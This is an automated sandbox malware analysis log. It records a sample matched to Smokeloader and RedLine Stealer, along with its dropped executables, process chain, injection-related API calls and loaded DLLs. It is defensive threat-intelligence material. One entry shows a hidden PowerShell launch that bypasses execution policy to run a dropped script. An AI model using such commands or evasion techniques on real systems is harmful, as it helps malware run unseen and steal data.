Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004026DC NtClose, 7_2_004026DC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004025DD NtOpenKey, 7_2_004025DD
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020E3 LocalAlloc,NtQuerySystemInformation, 7_2_004020E3
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation, 7_2_004020E7
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020FC LocalAlloc,NtQuerySystemInformation, 7_2_004020FC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00402285 NtQuerySystemInformation, 7_2_00402285
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020B6 LocalAlloc,NtQuerySystemInformation, 7_2_004020B6
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020B8 LocalAlloc,NtQuerySystemInformation, 7_2_004020B8
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D6900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation, 8_2_00007FF7A09D6900
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F4FC0 NtReadVirtualMemory, 8_2_00007FF7A09F4FC0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F59D0 NtProtectVirtualMemory, 8_2_00007FF7A09F59D0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F3F30 NtQueryInformationProcess, 8_2_00007FF7A09F3F30
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F5100 NtWriteVirtualMemory, 8_2_00007FF7A09F5100
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F5260 NtAllocateVirtualMemory, 8_2_00007FF7A09F5260
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\3530.exe AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\6E8A.exe 4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\7C81.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 004CFCA0 appears 202 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 004C93B0 appears 39 times
Source: 7C81.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: 6E8A.exe.2.dr Static PE information: No import functions for PE file found
Source: 3530.exe.2.dr Static PE information: No import functions for PE file found
Source: file.exe, 00000000.00000002.2095582375.0000000002448000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sashibt.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/15@16/14
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A0F5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken, 8_2_00007FF7A0A0F5B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0271455A CreateToolhelp32Snapshot,Module32First, 0_2_0271455A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E9C80 CoCreateInstance, 14_2_004E9C80
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sashibt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\3530.exe Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3530.tmp
Source: C:\Users\user\AppData\Local\Temp\7C81.exe File opened: C:\Windows\system32\5a55af7216446d40d953e278edaf5aa8cd73f3383fdbcf4ae41b21e0f53c23eaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe Virustotal: Detection: 42%
Source: 7C81.exe String found in binary or memory: &github.com/filecoin-project/go-address
Source: 7C81.exe String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: 7C81.exe String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: 7C81.exe String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: 7C81.exe String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\sashibt C:\Users\user\AppData\Roaming\sashibt
Source: unknown Process created: C:\Users\user\AppData\Roaming\sashibt C:\Users\user\AppData\Roaming\sashibt
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe C:\Users\user\AppData\Local\Temp\3530.exe
Source: C:\Users\user\AppData\Local\Temp\3530.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7C81.exe C:\Users\user\AppData\Local\Temp\7C81.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe C:\Users\user\AppData\Local\Temp\6E8A.exe
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe"
Source: C:\Users\user\AppData\Local\Temp\3530.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe"
Source: C:\Users\user\AppData\Local\Temp\3530.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe Section loaded: amsi.dll
Source: C:\Windows\explorer.exe Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\3530.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\3530.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mshtml.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: srpapi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: msiso.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
